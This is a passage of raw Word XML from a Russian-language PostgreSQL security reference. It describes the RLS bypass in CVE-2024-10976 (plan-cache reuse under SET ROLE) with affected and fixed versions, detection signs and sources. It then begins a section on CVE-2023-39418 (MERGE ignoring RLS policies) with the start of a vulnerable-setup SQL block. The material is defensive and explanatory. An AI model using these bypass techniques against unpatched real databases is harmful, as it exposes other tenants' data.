              <w:t>4.2 (Medium, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="05A57E9D"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087524"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82A29F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 ноября 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3481994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F70023"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CD13E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="307253E7"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E20525"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EC39CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2F6A2C1F"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098416"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1CF830" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Incorrect privilege assignment в plan-cache reuse под SET ROLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1B815BEA"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2B5D35"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A379B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RLS bypass через subquery/CTE/SQL function paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CAFF25B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Multi-tenant приложения с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request — стандартный pattern для PostgreSQL-based SaaS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F15870" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AuthZ через role identity</w:t>
      </w:r>
      <w:r>
        <w:t>: tenant_X отображается в database-role tenant_X, RLS policy filter по current_user или session-variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA9031" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection pooling</w:t>
      </w:r>
      <w:r>
        <w:t>: shared connections с SET ROLE — снижает overhead создания соединений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA5090" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subquery / CTE в reports</w:t>
      </w:r>
      <w:r>
        <w:t>: обычный pattern для dashboards с aggregates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725176F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание этих трёх — производит CVE-2024-10976. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не сам сценарий проблема</w:t>
      </w:r>
      <w:r>
        <w:t>, а bug в plan invalidation. Корректный setup на patched PG-версии работает безопасно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D7C41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4AF24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`auto_explain` log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Filter: (tenant_id = X)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где X не равен текущему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>-target — индикатор stale plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDFD6A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t>: один query-text с widely-varying rows-returned между sessions — поведенческая аномалия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A0DE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t>: tenant видит «extra» rows, которые не должен — обычно обнаруживается через customer complaints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133EC80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG version check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: deployment scripts проверяют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для confirmation что minor patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004A9F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки до фиксов 14.11.2024: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606F78D6"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DF93CCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ветка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D9E56AA"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E6FC1ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5236AE4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7B9E7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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7BAE60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0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DD5C9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="47287306"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C9B3D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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04055C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.4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4E693F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="65333FA8"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D17E8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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F0CB1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.8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AC833B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1430C63A"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1DF179"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C5A498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.13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483BF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="111E234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315698"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D3CF8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.16</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CE0EE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="63C3A0BC"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3C74EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>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5E4D90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.20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D26042" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.21 (последний minor — 12.22 после EOL 14.11.2024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62FA478D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>На версиях после фикса — bug закрыт, plan invalidates корректно при SET ROLE для всех RLS paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697E4B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2DD096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оба CVE опубликованы 14.11.2024, оба связаны с SET ROLE-paths. Граница: 3.13.1 — получение чужой роли в context = privilege escalation; 3.17.1 — чтение данных через cached RLS-filter = data leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A80CB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3 SET ROLE reset (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — connected CVE того же batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFCBCFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.5 SECURITY DEFINER функции и RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alternative bypass через SD functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB476C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel class пр. esc. в SD-функциях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141FCA56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст batch CVE 14.11.2024 (10976/10977/10978/10979).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1FF63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF5102" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B637D9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2024-10976 — https://www.postgresql.org/support/security/CVE-2024-10976/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6B93D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 17.1 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D44C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2024-10976 — https://nvd.nist.gov/vuln/detail/CVE-2024-10976</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50939A05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49889FF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Plan Caching» — https://www.postgresql.org/docs/current/plpgsql-implementation.html#PLPGSQL-PLAN-CACHING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D7AA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pganalyze blog: «PostgreSQL 17.1 security fixes» (CVE-2024-10976 / 10977 / 10978 / 10979) — https://pganalyze.com/blog/5mins-postgres-17-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18075427" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R9 (sources/research.md, строки 172–184)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C341CD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.2 MERGE не применяет UPDATE/SELECT policy (R11, CVE-2023-39418)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642E7DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — операция «upsert»-стиля, появившаяся в PostgreSQL 15.0 (октябрь 2022). Объединяет SELECT (для определения совпадения), INSERT (для не-matched), UPDATE/DELETE (для matched) в одном statement. В PG 15.0–15.3 (фикс в 15.4 — 10.08.2023) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MERGE не применял UPDATE/SELECT-полиции RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий мог через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> записать строку, которая нарушает существующую UPDATE-policy запрета (например, изменить tenant ownership). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>узкое окно ~10 месяцев</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (релиз 15.0 13.10.2022, фикс 15.4 10.08.2023), но критичное: новые pg-deployments, не обновлявшиеся в первые 10 месяцев существования 15.x ветки, уязвимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC57354" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2023-39418 — единственный SEC-bug по MERGE в открытой history. После 15.4 поведение MERGE корректное: применяются все relevant policies, как для INSERT (WITH CHECK), так и для UPDATE/SELECT (USING).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E65541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13615C48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Setup для multi-tenant orders с RLS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DFC71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE app.orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A3D10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB569A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1FEA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB36392" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount numeric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFD17F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414DFD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.orders ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDBE164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
